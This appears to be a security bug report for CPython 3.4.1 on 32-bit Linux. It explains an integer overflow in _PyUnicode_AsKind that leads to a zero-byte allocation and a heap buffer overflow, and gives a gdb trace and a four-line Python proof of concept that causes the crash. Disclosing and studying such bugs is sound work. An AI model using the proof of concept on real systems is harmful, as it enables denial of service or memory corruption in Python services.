# Bug # --- # # void* # _PyUnicode_AsKind(PyObject *s, unsigned int kind) # { # Py_ssize_t len; # ... # len = PyUnicode_GET_LENGTH(s); # ... # switch (kind) { # ... # case PyUnicode_4BYTE_KIND: # 1 result = PyMem_Malloc(len * sizeof(Py_UCS4)); # ... # else { # assert(skind == PyUnicode_1BYTE_KIND); # 2 _PyUnicode_CONVERT_BYTES( # Py_UCS1, Py_UCS4, # PyUnicode_1BYTE_DATA(s), # PyUnicode_1BYTE_DATA(s) + len, # result); # } # # 1. len equals 2^30, so len*sizeof(Py_UCS4)=2^30*2^2=2^32, which gets casted # down to 0, since PyMem_Malloc takes size_t as the parameter. Resulting buffer # is 0 bytes big. # 2. chars from the source string s (which are 1 byte long) are expanded to 4 # bytes and copied to the 'result' buffer, which is too small to hold them all # # Stack trace # ----------- # # Breakpoint 2, _PyUnicode_AsKind ( # s='a...', kind=4) at Objects/unicodeobject.c:2176 # 2176 if (PyUnicode_READY(s) == -1) # (gdb) n # 2179 len = PyUnicode_GET_LENGTH(s); # (gdb) n # 2180 skind = PyUnicode_KIND(s); # (gdb) n # 2181 if (skind >= kind) { # (gdb) n # 2185 switch (kind) { # (gdb) n # 2198 result = PyMem_Malloc(len * sizeof(Py_UCS4)); # (gdb) print len # $10 = 1073741824 # (gdb) print skind # $11 = 1 # (gdb) print kind # $12 = 4 # (gdb) print len*4 # $13 = 0 # (gdb) c # Continuing. # # Program received signal SIGSEGV, Segmentation fault. # 0x08130b56 in _PyUnicode_AsKind ( # s='a...', kind=4) at Objects/unicodeobject.c:2210 # 2210 _PyUnicode_CONVERT_BYTES( # # OS info # ------- # # % ./python -V # Python 3.4.1 # # % uname -a # Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 15:31:16 UTC 2013 i686 i686 i386 GNU/Linux # # POC # --- txt=b"\x0a\x0a\x0a\x00" uni=txt.decode("utf-32") sub="a"*(2**30) uni.count(sub)